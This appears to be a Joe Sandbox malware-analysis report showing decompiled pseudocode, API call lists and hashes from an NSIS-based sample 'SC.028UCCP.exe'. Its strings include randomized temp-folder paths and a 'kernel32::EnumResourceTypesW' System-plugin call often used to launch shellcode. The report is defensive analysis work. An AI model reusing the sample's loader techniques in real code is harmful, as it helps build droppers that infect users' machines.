                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040511E
                                  • ShowWindow.USER32(?,00000008), ref: 00405132
                                  • GetDlgItem.USER32 ref: 00405153
                                  • SendMessageA.USER32 ref: 00405163
                                  • SendMessageA.USER32 ref: 0040517C
                                  • SendMessageA.USER32 ref: 00405188
                                  • GetDlgItem.USER32 ref: 00405060
                                    • Part of subcall function 00403EDD: SendMessageA.USER32 ref: 00403EEB
                                  • GetDlgItem.USER32 ref: 004051A5
                                  • CreateThread.KERNEL32 ref: 004051B3
                                  • CloseHandle.KERNEL32(00000000), ref: 004051BA
                                  • ShowWindow.USER32(00000000), ref: 004051DE
                                  • ShowWindow.USER32(00000000,00000008), ref: 004051E3
                                  • ShowWindow.USER32(00000008), ref: 0040522A
                                  • SendMessageA.USER32 ref: 0040525C
                                  • CreatePopupMenu.USER32 ref: 0040526D
                                  • AppendMenuA.USER32 ref: 00405282
                                  • GetWindowRect.USER32 ref: 00405295
                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052B9
                                  • SendMessageA.USER32 ref: 004052F4
                                  • OpenClipboard.USER32(00000000), ref: 00405304
                                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040530A
                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405313
                                  • GlobalLock.KERNEL32 ref: 0040531D
                                  • SendMessageA.USER32 ref: 00405331
                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040534A
                                  • SetClipboardData.USER32 ref: 00405355
                                  • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040535B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                  • String ID: {
                                  • API String ID: 590372296-366298937
                                  • Opcode ID: deddfd4e36412dec96aa055fb552b981f44ea6835fd62dd796566a0b1e2ef51b
                                  • Instruction ID: a21e6249ac8bc888c709a424ccf7157ce7a7130d11ef99fd9928d349982f1b83
                                  • Opcode Fuzzy Hash: deddfd4e36412dec96aa055fb552b981f44ea6835fd62dd796566a0b1e2ef51b
                                  • Instruction Fuzzy Hash: A1A13A70900208FFEB219F61DC89AAE7F79FB04355F10817AFA05AA1A0C7755A41DF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E004042E6(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				long _v16;
                                  				long _v20;
                                  				char _v24;
                                  				long _v28;
                                  				char _v32;
                                  				intOrPtr _v36;
                                  				long _v40;
                                  				signed int _v44;
                                  				CHAR* _v52;
                                  				intOrPtr _v56;
                                  				intOrPtr _v60;
                                  				intOrPtr _v64;
                                  				CHAR* _v68;
                                  				void _v72;
                                  				struct HWND__* _v76;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t78;
                                  				long _t83;
                                  				signed char* _t85;
                                  				void* _t91;
                                  				signed int _t92;
                                  				signed char _t110;
                                  				signed int _t114;
                                  				struct HWND__** _t118;
                                  				intOrPtr _t120;
                                  				intOrPtr* _t134;
                                  				CHAR* _t142;
                                  				intOrPtr _t144;
                                  				signed char _t145;
                                  				signed int _t146;
                                  				signed int _t150;
                                  				signed int* _t152;
                                  				signed int _t153;
                                  				signed char* _t154;
                                  				struct HWND__* _t159;
                                  				struct HWND__* _t160;
                                  				int _t162;
                                  
                                  				_t78 =  *0x4297f8;
                                  				_v36 = _t78;
                                  				_t142 = ( *(_t78 + 0x3c) << 0xa) + "kernel32::EnumResourceTypesW(i 0,i r1,i 0)";
                                  				_v12 =  *((intOrPtr*)(_t78 + 0x38));
                                  				if(_a8 == 0x40b) {
                                  					E004053AD(0x3fb, _t142);
                                  					E00405E03(_t142);
                                  				}
                                  				_t160 = _a4;
                                  				if(_a8 != 0x110) {
                                  					L8:
                                  					if(_a8 != 0x111) {
                                  						L20:
                                  						if(_a8 == 0x40f) {
                                  							L22:
                                  							_v8 = _v8 & 0x00000000;
                                  							_v12 = _v12 & 0x00000000;
                                  							E004053AD(0x3fb, _t142);
                                  							if(E00405733(_t179, _t142) == 0) {
                                  								_v8 = 1;
                                  							}
                                  							E00405B98(0x428ff0, _t142);
                                  							_t152 = 0;
                                  							_t83 = E00405EC3(0);
                                  							_v16 = _t83;
                                  							if(_t83 == 0 || 0 == 0x428ff0) {
                                  								L30:
                                  								E00405B98(0x428ff0, _t142);
                                  								_t85 = E004056DE(0x428ff0);
                                  								if(_t85 != 0) {
                                  									 *_t85 =  *_t85 & 0x00000000;
                                  								}
                                  								if(GetDiskFreeSpaceA(0x428ff0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                                  									_t153 = _a8;
                                  									goto L36;
                                  								} else {
                                  									_t162 = 0x400;
                                  									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                                  									_v12 = 1;
                                  									goto L37;
                                  								}
                                  							} else {
                                  								while(1) {
                                  									_t110 = _v16(0x428ff0,  &_v44,  &_v32,  &_v24);
                                  									if(_t110 != 0) {
                                  										break;
                                  									}
                                  									if(_t152 != 0) {
                                  										 *_t152 =  *_t152 & _t110;
                                  									}
                                  									_t154 = E0040568C(0x428ff0);
                                  									 *_t154 =  *_t154 & 0x00000000;
                                  									_t152 = _t154 - 1;
                                  									 *_t152 = 0x5c;
                                  									if(_t152 != 0x428ff0) {
                                  										continue;
                                  									} else {
                                  										goto L30;
                                  									}
                                  								}
                                  								_v16 = 0xa;
                                  								_t145 = _v16;
                                  								_t150 = _v40;
                                  								_v40 = _t150 >> _t145;
                                  								_t153 = (_t150 << 0x00000020 | _v44) >> _t145;
                                  								_v12 = 1;
                                  								L36:
                                  								_t162 = 0x400;
                                  								L37:
                                  								_t91 = E00404743(5);
                                  								if(_v12 != 0 && _t153 < _t91) {
                                  									_v8 = 2;
                                  								}
                                  								_t144 =  *0x42e37c; // 0x5ac8c7
                                  								if( *((intOrPtr*)(_t144 + 0x10)) != 0) {
                                  									E0040468E(0x3ff, 0xfffffffb, _t91);
                                  									if(_v12 == 0) {
                                  										SetDlgItemTextA(_a4, _t162, 0x428fe0);
                                  									} else {
                                  										E0040468E(_t162, 0xfffffffc, _t153);
                                  									}
                                  								}
                                  								_t92 = _v8;
                                  								 *0x42ec44 = _t92;
                                  								if(_t92 == 0) {
                                  									_v8 = E0040140B(7);
                                  								}
                                  								if(( *(_v36 + 0x14) & _t162) != 0) {
                                  									_v8 = 0;
                                  								}
                                  								E00403ECA(0 | _v8 == 0x00000000);
                                  								if(_v8 == 0 &&  *0x42a010 == 0) {
                                  									E0040427B();
                                  								}
                                  								 *0x42a010 = 0;
                                  								goto L52;
                                  							}
                                  						}
                                  						_t179 = _a8 - 0x405;
                                  						if(_a8 != 0x405) {
                                  							goto L52;
                                  						}
                                  						goto L22;
                                  					}
                                  					_t114 = _a12 & 0x0000ffff;
                                  					if(_t114 != 0x3fb) {
                                  						L12:
                                  						if(_t114 == 0x3e9) {
                                  							_t146 = 7;
                                  							memset( &_v72, 0, _t146 << 2);
                                  							_v76 = _t160;
                                  							_v68 = 0x42a020;
                                  							_v56 = E00404628;
                                  							_v52 = _t142;
                                  							_v64 = E00405BBA(_t142, 0x42a020, _t160, 0x4293f8, _v12);
                                  							_t118 =  &_v76;
                                  							_v60 = 0x41;
                                  							__imp__SHBrowseForFolderA(_t118);
                                  							if(_t118 == 0) {
                                  								_a8 = 0x40f;
                                  							} else {
                                  								__imp__CoTaskMemFree(_t118);
                                  								E00405645(_t142);
                                  								_t120 =  *0x42ebb0; // 0x5aa248
                                  								_t121 =  *((intOrPtr*)(_t120 + 0x11c));
                                  								if( *((intOrPtr*)(_t120 + 0x11c)) != 0 && _t142 == "C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter") {
                                  									E00405BBA(_t142, 0x42a020, _t160, 0, _t121);
                                  									if(lstrcmpiA(0x42db40, 0x42a020) != 0) {
                                  										lstrcatA(_t142, 0x42db40);
                                  									}
                                  								}
                                  								 *0x42a010 =  *0x42a010 + 1;
                                  								SetDlgItemTextA(_t160, 0x3fb, _t142);
                                  							}
                                  						}
                                  						goto L20;
                                  					}
                                  					if(_a12 >> 0x10 != 0x300) {
                                  						goto L52;
                                  					}
                                  					_a8 = 0x40f;
                                  					goto L12;
                                  				} else {
                                  					_t159 = GetDlgItem(_t160, 0x3fb);
                                  					if(E004056B2(_t142) != 0 && E004056DE(_t142) == 0) {
                                  						E00405645(_t142);
                                  					}
                                  					 *0x42e378 = _t160;
                                  					SetWindowTextA(_t159, _t142);
                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                  					_push(1);
                                  					E00403EA8(_t160);
                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                  					_push(0x14);
                                  					E00403EA8(_t160);
                                  					E00403EDD(_t159);
                                  					_t134 = E00405EC3(7);
                                  					if(_t134 == 0) {
                                  						L52:
                                  						return E00403F0F(_a8, _a12, _a16);
                                  					}
                                  					 *_t134(_t159, 1);
                                  					goto L8;
                                  				}
                                  			}













































                                  APIs
                                  • GetDlgItem.USER32 ref: 00404335
                                  • SetWindowTextA.USER32(00000000,?), ref: 0040435F
                                  • SHBrowseForFolderA.SHELL32(?,004293F8,?), ref: 00404410
                                  • CoTaskMemFree.OLE32(00000000), ref: 0040441B
                                  • lstrcmpiA.KERNEL32(Call,0042A020,00000000,?,?), ref: 0040444D
                                  • lstrcatA.KERNEL32(?,Call), ref: 00404459
                                  • SetDlgItemTextA.USER32 ref: 0040446B
                                    • Part of subcall function 004053AD: GetDlgItemTextA.USER32 ref: 004053C0
                                    • Part of subcall function 00405E03: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E5B
                                    • Part of subcall function 00405E03: CharNextA.USER32(?,?,?,00000000), ref: 00405E68
                                    • Part of subcall function 00405E03: CharNextA.USER32(?,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E6D
                                    • Part of subcall function 00405E03: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E7D
                                  • GetDiskFreeSpaceA.KERNEL32(00428FF0,?,?,0000040F,?,00428FF0,00428FF0,?,00000000,00428FF0,?,?,000003FB,?), ref: 00404526
                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404541
                                  • SetDlgItemTextA.USER32 ref: 004045C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                  • String ID: A$C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                  • API String ID: 2246997448-787186541
                                  • Opcode ID: d23cb239359365670f9594dc644bc9f5f48d86bff810e90447d5b69a40d7c4fd
                                  • Instruction ID: 9abece32c8f8525092503bbe75bfebeadc75c5700619eb1d4e27c73c3de0a32c
                                  • Opcode Fuzzy Hash: d23cb239359365670f9594dc644bc9f5f48d86bff810e90447d5b69a40d7c4fd
                                  • Instruction Fuzzy Hash: F99160B1900219ABDB11AFA1CC85FAF77B8EF84314F14447BFA01B62D1D77C9A418B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E00402036() {
                                  				void* _t44;
                                  				intOrPtr* _t48;
                                  				intOrPtr* _t50;
                                  				intOrPtr* _t52;
                                  				intOrPtr* _t54;
                                  				signed int _t58;
                                  				intOrPtr* _t59;
                                  				intOrPtr* _t62;
                                  				intOrPtr* _t64;
                                  				intOrPtr* _t66;
                                  				intOrPtr* _t69;
                                  				intOrPtr* _t71;
                                  				int _t75;
                                  				signed int _t81;
                                  				intOrPtr* _t88;
                                  				void* _t95;
                                  				void* _t96;
                                  				void* _t100;
                                  
                                  				 *(_t100 - 0x2c) = E00402A07(0xfffffff0);
                                  				_t96 = E00402A07(0xffffffdf);
                                  				 *((intOrPtr*)(_t100 - 0x30)) = E00402A07(2);
                                  				 *((intOrPtr*)(_t100 - 8)) = E00402A07(0xffffffcd);
                                  				 *((intOrPtr*)(_t100 - 0x44)) = E00402A07(0x45);
                                  				if(E004056B2(_t96) == 0) {
                                  					E00402A07(0x21);
                                  				}
                                  				_t44 = _t100 + 8;
                                  				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
                                  				if(_t44 < _t75) {
                                  					L13:
                                  					 *((intOrPtr*)(_t100 - 4)) = 1;
                                  					_push(0xfffffff0);
                                  				} else {
                                  					_t48 =  *((intOrPtr*)(_t100 + 8));
                                  					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
                                  					if(_t95 >= _t75) {
                                  						_t52 =  *((intOrPtr*)(_t100 + 8));
                                  						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                  						_t54 =  *((intOrPtr*)(_t100 + 8));
                                  						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter\\cavil\\Ablativers91");
                                  						_t81 =  *(_t100 - 0x14);
                                  						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                  						if(_t58 != 0) {
                                  							_t88 =  *((intOrPtr*)(_t100 + 8));
                                  							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                  							_t81 =  *(_t100 - 0x14);
                                  						}
                                  						_t59 =  *((intOrPtr*)(_t100 + 8));
                                  						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                  						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                                  							_t71 =  *((intOrPtr*)(_t100 + 8));
                                  							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                                  						}
                                  						_t62 =  *((intOrPtr*)(_t100 + 8));
                                  						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x30)));
                                  						_t64 =  *((intOrPtr*)(_t100 + 8));
                                  						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                  						if(_t95 >= _t75) {
                                  							_t95 = 0x80004005;
                                  							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x2c), 0xffffffff, 0x4093c0, 0x400) != 0) {
                                  								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                                  								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x4093c0, 1);
                                  							}
                                  						}
                                  						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                                  						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                  					}
                                  					_t50 =  *((intOrPtr*)(_t100 + 8));
                                  					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                  					if(_t95 >= _t75) {
                                  						_push(0xfffffff4);
                                  					} else {
                                  						goto L13;
                                  					}
                                  				}
                                  				E00401423();
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t100 - 4));
                                  				return 0;
                                  			}






















                                  APIs
                                  • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,004093C0,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91, xrefs: 004020C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91
                                  • API String ID: 123533781-3958623274
                                  • Opcode ID: 64eec70c754d109447af7b932e79b34c7f0716fcde24013fc759d13fc428f681
                                  • Instruction ID: c2a05210b12a7f26350eeaf6b52b14759966ff166b2aa6569d537109482c51a9
                                  • Opcode Fuzzy Hash: 64eec70c754d109447af7b932e79b34c7f0716fcde24013fc759d13fc428f681
                                  • Instruction Fuzzy Hash: D6415E75A00105BFCB04EFA4CD88EAE7BB9EF49314F204169F905EB2D1CA79AD41CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 39%
                                  			E0040264F(char __ebx, char* __edi, char* __esi) {
                                  				void* _t19;
                                  
                                  				if(FindFirstFileA(E00402A07(2), _t19 - 0x1a4) != 0xffffffff) {
                                  					E00405AF6(__edi, _t6);
                                  					_push(_t19 - 0x178);
                                  					_push(__esi);
                                  					E00405B98();
                                  				} else {
                                  					 *__edi = __ebx;
                                  					 *__esi = __ebx;
                                  					 *((intOrPtr*)(_t19 - 4)) = 1;
                                  				}
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t19 - 4));
                                  				return 0;
                                  			}





                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040265E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: 1dc36b911a92c03ca8d010b827bf73e80ff9ef9148a92f3886a19f506a53c419
                                  • Instruction ID: 0ab26aaebdd48f152f40d34805009047639191bb1b3aa8c2dea3f4c4e5e46e36
                                  • Opcode Fuzzy Hash: 1dc36b911a92c03ca8d010b827bf73e80ff9ef9148a92f3886a19f506a53c419
                                  • Instruction Fuzzy Hash: 0EF0A0326082109AD700E7B5A949AEEB7788B15324F60067BE101E20C2C6B969859B2E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E004062C3(signed int __ebx, signed int* __esi) {
                                  				signed int _t396;
                                  				signed int _t425;
                                  				signed int _t442;
                                  				signed int _t443;
                                  				signed int* _t446;
                                  				void* _t448;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					_t446 = __esi;
                                  					_t425 = __ebx;
                                  					if( *(_t448 - 0x34) == 0) {
                                  						break;
                                  					}
                                  					L55:
                                  					__eax =  *(__ebp - 0x38);
                                  					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  					__ecx = __ebx;
                                  					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  					__ebx = __ebx + 8;
                                  					while(1) {
                                  						L56:
                                  						if(__ebx < 0xe) {
                                  							goto L0;
                                  						}
                                  						L57:
                                  						__eax =  *(__ebp - 0x40);
                                  						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                  						__ecx = __eax;
                                  						__esi[1] = __eax;
                                  						__ecx = __eax & 0x0000001f;
                                  						if(__cl > 0x1d) {
                                  							L9:
                                  							_t443 = _t442 | 0xffffffff;
                                  							 *_t446 = 0x11;
                                  							L10:
                                  							_t446[0x147] =  *(_t448 - 0x40);
                                  							_t446[0x146] = _t425;
                                  							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                  							L11:
                                  							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                  							_t446[0x26ea] =  *(_t448 - 0x30);
                                  							E00406A32( *(_t448 + 8));
                                  							return _t443;
                                  						}
                                  						L58:
                                  						__eax = __eax & 0x000003e0;
                                  						if(__eax > 0x3a0) {
                                  							goto L9;
                                  						}
                                  						L59:
                                  						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                  						__ebx = __ebx - 0xe;
                                  						_t94 =  &(__esi[2]);
                                  						 *_t94 = __esi[2] & 0x00000000;
                                  						 *__esi = 0xc;
                                  						while(1) {
                                  							L60:
                                  							__esi[1] = __esi[1] >> 0xa;
                                  							__eax = (__esi[1] >> 0xa) + 4;
                                  							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                  								goto L68;
                                  							}
                                  							L61:
                                  							while(1) {
                                  								L64:
                                  								if(__ebx >= 3) {
                                  									break;
                                  								}
                                  								L62:
                                  								if( *(__ebp - 0x34) == 0) {
                                  									goto L182;
                                  								}
                                  								L63:
                                  								__eax =  *(__ebp - 0x38);
                                  								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  								__ecx = __ebx;
                                  								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  								__ebx = __ebx + 8;
                                  							}
                                  							L65:
                                  							__ecx = __esi[2];
                                  							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                  							__ebx = __ebx - 3;
                                  							_t108 = __ecx + 0x407374; // 0x121110
                                  							__ecx =  *_t108;
                                  							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                  							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                  							__ecx = __esi[1];
                                  							__esi[2] = __esi[2] + 1;
                                  							__eax = __esi[2];
                                  							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                  							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                  								goto L64;
                                  							}
                                  							L66:
                                  							while(1) {
                                  								L68:
                                  								if(__esi[2] >= 0x13) {
                                  									break;
                                  								}
                                  								L67:
                                  								_t119 = __esi[2] + 0x407374; // 0x4000300
                                  								__eax =  *_t119;
                                  								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                  								_t126 =  &(__esi[2]);
                                  								 *_t126 = __esi[2] + 1;
                                  							}
                                  							L69:
                                  							__ecx = __ebp - 8;
                                  							__edi =  &(__esi[0x143]);
                                  							 &(__esi[0x148]) =  &(__esi[0x144]);
                                  							__eax = 0;
                                  							 *(__ebp - 8) = 0;
                                  							__eax =  &(__esi[3]);
                                  							 *__edi = 7;
                                  							__eax = E00406A9A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                  							if(__eax != 0) {
                                  								L72:
                                  								 *__esi = 0x11;
                                  								while(1) {
                                  									L180:
                                  									_t396 =  *_t446;
                                  									if(_t396 > 0xf) {
                                  										break;
                                  									}
                                  									L1:
                                  									switch( *((intOrPtr*)(_t396 * 4 +  &M004069F2))) {
                                  										case 0:
                                  											L101:
                                  											__eax = __esi[4] & 0x000000ff;
                                  											__esi[3] = __esi[4] & 0x000000ff;
                                  											__eax = __esi[5];
                                  											__esi[2] = __esi[5];
                                  											 *__esi = 1;
                                  											goto L102;
                                  										case 1:
                                  											L102:
                                  											__eax = __esi[3];
                                  											while(1) {
                                  												L105:
                                  												__eflags = __ebx - __eax;
                                  												if(__ebx >= __eax) {
                                  													break;
                                  												}
                                  												L103:
                                  												__eflags =  *(__ebp - 0x34);
                                  												if( *(__ebp - 0x34) == 0) {
                                  													goto L182;
                                  												}
                                  												L104:
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                  												__ecx = __ebx;
                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  												__ebx = __ebx + 8;
                                  												__eflags = __ebx;
                                  											}
                                  											L106:
                                  											__eax =  *(0x409394 + __eax * 2) & 0x0000ffff;
                                  											__eax = __eax &  *(__ebp - 0x40);
                                  											__ecx = __esi[2];
                                  											__eax = __esi[2] + __eax * 4;
                                  											__ecx =  *(__eax + 1) & 0x000000ff;
                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                  											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                  											__ecx =  *__eax & 0x000000ff;
                                  											__eflags = __ecx;
                                  											if(__ecx != 0) {
                                  												L108:
                                  												__eflags = __cl & 0x00000010;
                                  												if((__cl & 0x00000010) == 0) {
                                  													L110:
                                  													__eflags = __cl & 0x00000040;
                                  													if((__cl & 0x00000040) == 0) {
                                  														goto L125;
                                  													}
                                  													L111:
                                  													__eflags = __cl & 0x00000020;
                                  													if((__cl & 0x00000020) == 0) {
                                  														goto L9;
                                  													}
                                  													L112:
                                  													 *__esi = 7;
                                  													goto L180;
                                  												}
                                  												L109:
                                  												__esi[2] = __ecx;
                                  												__esi[1] = __eax;
                                  												 *__esi = 2;
                                  												goto L180;
                                  											}
                                  											L107:
                                  											__esi[2] = __eax;
                                  											 *__esi = 6;
                                  											goto L180;
                                  										case 2:
                                  											L113:
                                  											__eax = __esi[2];
                                  											while(1) {
                                  												L116:
                                  												__eflags = __ebx - __eax;
                                  												if(__ebx >= __eax) {
                                  													break;
                                  												}
                                  												L114:
                                  												__eflags =  *(__ebp - 0x34);
